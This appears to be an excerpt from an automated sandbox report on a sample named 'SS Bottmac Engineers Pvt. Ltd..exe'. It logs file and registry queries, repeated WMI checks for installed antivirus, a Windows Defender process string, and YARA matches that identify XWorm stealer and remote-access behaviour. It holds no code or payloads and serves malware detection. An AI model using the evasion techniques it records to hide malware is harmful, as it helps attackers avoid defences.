Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070FF000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: er\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
